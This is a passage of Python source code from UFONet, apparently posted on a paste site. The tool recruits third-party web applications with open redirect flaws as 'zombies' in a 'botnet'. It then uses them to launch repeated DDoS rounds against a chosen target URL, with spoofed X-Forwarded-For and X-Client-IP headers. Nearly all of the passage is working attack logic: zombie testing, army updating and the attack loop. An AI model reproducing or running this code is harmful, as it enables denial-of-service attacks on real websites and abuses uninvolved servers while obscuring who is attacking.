  1430.             else:                                    
  1431.                 url_attack = zombie + options.target # Use zombie vector to connect to original target url
  1432.             #print url_attack
  1433.             print "Payload:", url_attack
  1434.             c.setopt(pycurl.URL, url_attack) # GET connection on target site
  1435.             c.setopt(pycurl.NOBODY, 0)  # use GET
  1436.         fakeheaders = ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg', 'Connection: Keep-Alive', 'Content-type: application/x-www-form-urlencoded; charset=UTF-8', 'Cache-control: no-cache', 'Pragma: no-cache', 'Pragma-directive: no-cache', 'Cache-directive: no-cache', 'Expires: 0'] # set fake headers (important: no-cache)
  1437.         c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
  1438.         c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
  1439.         c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
  1440.         c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
  1441.         c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
  1442.         c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
  1443.         c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
  1444.         c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
  1445.         if options.xforw: # set x-forwarded-for
  1446.             generate_random_xforw = RandomIP()
  1447.             xforwip = generate_random_xforw._generateip('')
  1448.             xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
  1449.             fakeheaders = fakeheaders + xforwfakevalue
  1450.         if options.xclient: # set x-client-ip
  1451.             generate_random_xclient = RandomIP()
  1452.             xclientip = generate_random_xclient._generateip('')
  1453.             xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
  1454.             fakeheaders = fakeheaders + xclientfakevalue
  1455.         if options.host: # set http host header
  1456.             host_fakevalue = ['Host: ' + str(options.host)]
  1457.             fakeheaders = fakeheaders + host_fakevalue
  1458.         c.setopt(pycurl.HTTPHEADER, fakeheaders) # set fake headers
  1459.         b = StringIO.StringIO()
  1460.         c.setopt(pycurl.HEADERFUNCTION, b.write)
  1461.         h = StringIO.StringIO()
  1462.         c.setopt(pycurl.WRITEFUNCTION, h.write)
  1463.         if options.agent: # set user-agent
  1464.             c.setopt(pycurl.USERAGENT, options.agent)
  1465.         else:
  1466.             c.setopt(pycurl.USERAGENT, self.user_agent)
  1467.         if options.referer: # set referer
  1468.             c.setopt(pycurl.REFERER, options.referer)
  1469.         else:
  1470.             c.setopt(pycurl.REFERER, self.referer)
  1471.         if options.proxy: # set proxy
  1472.             c.setopt(pycurl.PROXY, options.proxy)
  1473.         else:
  1474.             c.setopt(pycurl.PROXY, '')
  1475.         if options.timeout: # set timeout
  1476.             c.setopt(pycurl.TIMEOUT, options.timeout)
  1477.             c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
  1478.         else:
  1479.             c.setopt(pycurl.TIMEOUT, 10)
  1480.             c.setopt(pycurl.CONNECTTIMEOUT, 10)
  1481.         if options.delay: # set delay
  1482.             self.delay = options.delay
  1483.         else:
  1484.             self.delay = 0
  1485.         if options.retries: # set retries
  1486.             self.retries = options.retries
  1487.         else:
  1488.             self.retries = 1
  1489.         try: # try to connect
  1490.             c.perform()
  1491.             time.sleep(self.delay)
  1492.             self.connection_failed = False
  1493.         except Exception, e: # try retries
  1494.             #print str(e)
  1495.             for count in range(0, self.retries):
  1496.                 time.sleep(self.delay)
  1497.                 try:
  1498.                     c.perform()
  1499.                     self.connection_failed = False
  1500.                 except:
  1501.                     self.connection_failed = True
  1502.         if self.head == True: # HEAD reply
  1503.             code_reply = c.getinfo(pycurl.HTTP_CODE)
  1504.             reply = b.getvalue()
  1505.             if options.verbose:
  1506.                 print "Reply:"
  1507.                 print "\n", reply
  1508.             return code_reply
  1509.         if self.external == True: # External reply
  1510.             external_reply = h.getvalue()
  1511.             if options.verbose:
  1512.                 print "Reply:"
  1513.                 print "\n", external_reply
  1514.             return external_reply
  1515.         if self.payload == True: # Payloads reply
  1516.             payload_reply = h.getvalue()
  1517.             if options.verbose:
  1518.                 print "Reply:"
  1519.                 print "\n", payload_reply
  1520.             return payload_reply
  1521.         if self.attack_mode == True: # Attack mode reply
  1522.             attack_reply = h.getvalue()
  1523.             if options.verbose:
  1524.                 print "Reply:"
  1525.                 print "\n", attack_reply
  1526.             return attack_reply
  1527.  
  1528.     def testing(self, zombies):
  1529.         # test Open Redirect vulnerabilities on webapps and show statistics
  1530.         # HTTP HEAD check
  1531.         print ("Are 'they' alive? :-) (HEAD Check):")
  1532.         print '='*35
  1533.         num_active_zombies = 0
  1534.         num_failed_zombies = 0
  1535.         active_zombies = []
  1536.         army = 0
  1537.         print "Trying:", len(zombies)
  1538.         print '-'*21
  1539.         for zombie in zombies:
  1540.             zombie = str(zombie)
  1541.             t = urlparse(zombie)
  1542.             if zombie.startswith("http://") or zombie.startswith("https://"):
  1543.                 # send HEAD connection
  1544.                 self.head = True
  1545.                 code_reply = str(self.connect_zombies(zombie))
  1546.                 self.head = False
  1547.                 if code_reply == "200" or code_reply == "302" or code_reply == "301" or code_reply == "401" or code_reply == "403" or code_reply == "405":
  1548.                     name_zombie = t.netloc
  1549.                     print "Zombie:", name_zombie
  1550.                     print "Status: Ok ["+ code_reply + "]"
  1551.                     num_active_zombies = num_active_zombies + 1
  1552.                     active_zombies.append(zombie)
  1553.                 elif code_reply == "404":
  1554.                     print "Zombie:", t.netloc
  1555.                     print "Status: Not Found ["+ code_reply + "]"
  1556.                     num_failed_zombies = num_failed_zombies + 1
  1557.                 else:
  1558.                     print "Zombie:", t.netloc, zombie
  1559.                     print "Status: Not Allowed ["+ code_reply + "]"
  1560.                     num_failed_zombies = num_failed_zombies + 1
  1561.             else:
  1562.                 if self.options.verbose:
  1563.                     print "Reply:", "\n\nNothing!!!!!\n"
  1564.                 print "Zombie:", zombie
  1565.                 print "Status: Malformed!"
  1566.                 num_failed_zombies = num_failed_zombies + 1
  1567.             print '-'*10
  1568.         print '='*18
  1569.         print "OK:", num_active_zombies, "Fail:", num_failed_zombies
  1570.         print '='*18
  1571.         if num_active_zombies == 0:
  1572.             print "\n[INFO] - Not any zombie active!\n"
  1573.             return #sys.exit(2)
  1574.         print '='*22
  1575.         # check url parameter vectors
  1576.         print ("Checking for payloads:")
  1577.         print '='*22
  1578.         print "Trying:", num_active_zombies
  1579.         print '-'*21
  1580.         zombies_ready = []
  1581.         num_waiting_zombies = 0
  1582.         num_disconnected_zombies = 0
  1583.         for zombie in active_zombies:
  1584.             zombie = str(zombie)
  1585.             t = urlparse(zombie)
  1586.             name_zombie = t.netloc
  1587.             payload_zombie = zombie
  1588.             print "Vector:", payload_zombie
  1589.             self.payload = True
  1590.             try:
  1591.                 payload_reply = str(self.connect_zombies(zombie))
  1592.             except:
  1593.                 payload_reply = ""
  1594.             self.payload = False
  1595.             if "http://www.google.es" in payload_reply: #Open Redirect reply
  1596.                 num_waiting_zombies = num_waiting_zombies + 1
  1597.                 print "Status:", "Waiting your orders..."
  1598.                 zombies_ready.append(zombie)
  1599.             else:
  1600.                 num_disconnected_zombies = num_disconnected_zombies + 1
  1601.                 print "Status:", "Not ready..."
  1602.             army = army + 1
  1603.             print '-'*10
  1604.         print '='*18
  1605.         print "OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies
  1606.         print '='*18
  1607.         print '='*18
  1608.         # list of 'zombies' ready to attack
  1609.         print ("Army of 'zombies'")
  1610.         print '='*18
  1611.         num_active_zombie = 0
  1612.         for z in zombies_ready:
  1613.             t = urlparse(z)
  1614.             name_zombie = t.netloc
  1615.             num_active_zombie = num_active_zombie + 1
  1616.             if self.options.verbose:
  1617.                 print "Zombie [", num_active_zombie, "]:", name_zombie
  1618.         print '-'*18
  1619.         print "Total Army:", num_active_zombie
  1620.         print '-'*18
  1621.         # update 'zombies' list
  1622.         if num_active_zombie == 0:
  1623.             print "\n[INFO] - Not any zombie active!\n"
  1624.         else:
  1625.             if not self.options.forceyes:
  1626.                 update_reply = raw_input("Wanna update your army (Y/n)")
  1627.                 print '-'*25
  1628.             else:
  1629.                 update_reply = "Y"
  1630.             if update_reply == "n" or update_reply == "N":
  1631.                 print "\nBye!\n"
  1632.                 return #sys.exit(2)
  1633.             else:
  1634.                 self.update_zombies(zombies_ready)
  1635.                 print "\n[INFO] - Botnet updated! ;-)\n"
  1636.  
  1637.     def attacking(self, zombies):
  1638.         # Perform a DDoS Web attack against a target, using Open Redirect vectors on third party machines (aka 'zombies')
  1639.         target = self.options.target
  1640.         if target.startswith("http://") or target.startswith("https://"):
  1641.             print "Attacking: ", target
  1642.             print '='*55, "\n"
  1643.             # send Open Redirect injection
  1644.             reply = self.injection(target, zombies)
  1645.         else:
  1646.             print "\n[Error] - Target url not valid!\n"
  1647.  
  1648.     def injection(self, target, zombies):
  1649.         options = self.options
  1650.         head_check_here = False
  1651.         head_check_external = False
  1652.         print '='*21
  1653.         print "Round: 'Is target up?'"
  1654.         print '='*21
  1655.         # send HEAD connection
  1656.         self.head = True
  1657.         try:
  1658.             reply = self.connect_zombies(target)
  1659.             if reply:
  1660.                 print "From here: YES"
  1661.                 head_check_here = True
  1662.             else:
  1663.                 print "From Here: NO | WARNING: Check failed from your connection ;("
  1664.                 head_check_here = False
  1665.         except Exception:
  1666.             print "From Here: NO | WARNING: Check failed from your connection ;("
  1667.             head_check_here = False
  1668.         self.head = False
  1669.         print '-'*21
  1670.         # check target on third party service (ex: http://www.downforeveryoneorjustme.com)
  1671.         self.external = True
  1672.         try:
  1673.             external_reply = self.connect_zombies(target)
  1674.             if "It's just you" in external_reply: # parse external service for correct reply
  1675.                 print "From exterior: YES"
  1676.                 head_check_external = True
  1677.             else:
  1678.                 print "From exterior: NO | WARNING: Check failed from external services ;("
  1679.                 head_check_external = False
  1680.         except Exception:
  1681.             print "blah"
  1682.             print "From exterior: NO | WARNING: Check failed from external services ;("
  1683.             head_check_external = False
  1684.         self.external = False
  1685.         print '-'*21, "\n"
  1686.         # ask for start the attack
  1687.         if head_check_here == True or head_check_external == True:
  1688.             if not self.options.forceyes:
  1689.                 start_reply = raw_input("Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)\n")
  1690.                 print '-'*25
  1691.             else:
  1692.                 start_reply = "Y"
  1693.             if start_reply == "y" or start_reply == "Y":
  1694.                 total_rounds = options.rounds # extract number of rounds
  1695.                 if total_rounds <= "0":
  1696.                     total_rounds = 1
  1697.                 num_round = 1
  1698.                 num_hits = 0
  1699.                 num_zombie = 1
  1700.                 # start to attack the target with each zombie
  1701.                 zombies = self.extract_zombies() # extract zombies from file
  1702.                 total_zombie = len(zombies)
  1703.                 for i in range(0, int(total_rounds)):
  1704.                     for zombie in zombies:
  1705.                         print '='*45
  1706.                         print "Zombie:", num_zombie, "| Round:", num_round, "| Total Rounds:", total_rounds
  1707.                         print '='*45
  1708.                         t = urlparse(zombie)
  1709.                         name_zombie = t.netloc
  1710.                         self.attack_mode = True
  1711.                         print "Name:", name_zombie
  1712.                         attack_reply = self.connect_zombies(zombie)
  1713.                         if self.connection_failed == False:
  1714.                             print "Status: Hit!"
  1715.                             num_hits = num_hits + 1
  1716.                         else:
  1717.                             print "Status: Failed :("
  1718.                         num_zombie = num_zombie + 1
  1719.                         if num_zombie > total_zombie:
  1720.                             num_zombie = 1
  1721.                         print '-'*10
  1722.                     num_round = num_round + 1
  1723.                     shuffle(zombies) # suffle zombies order
  1724.                 attack_mode = False
  1725.                 print '='*21
  1726.                 print "Total hits:", num_hits
  1727.                 print '='*21
  1728.                 print "\n[INFO] - Attack completed! ;-)\n"
  1729.             else:
  1730.                 print "\nBye!\n"
  1731.         else:
  1732.             print "Your target looks OFFLINE!?\n"
  1733.             print '-'*25
  1734.             print "\nBye!\n"
  1735.  
  1736. if __name__ == "__main__":
  1737.     app = UFONet()
  1738.     options = app.create_options()
  1739.     if options:
  1740.         app.set_options(options)
  1741.         app.run()
RAW Paste Data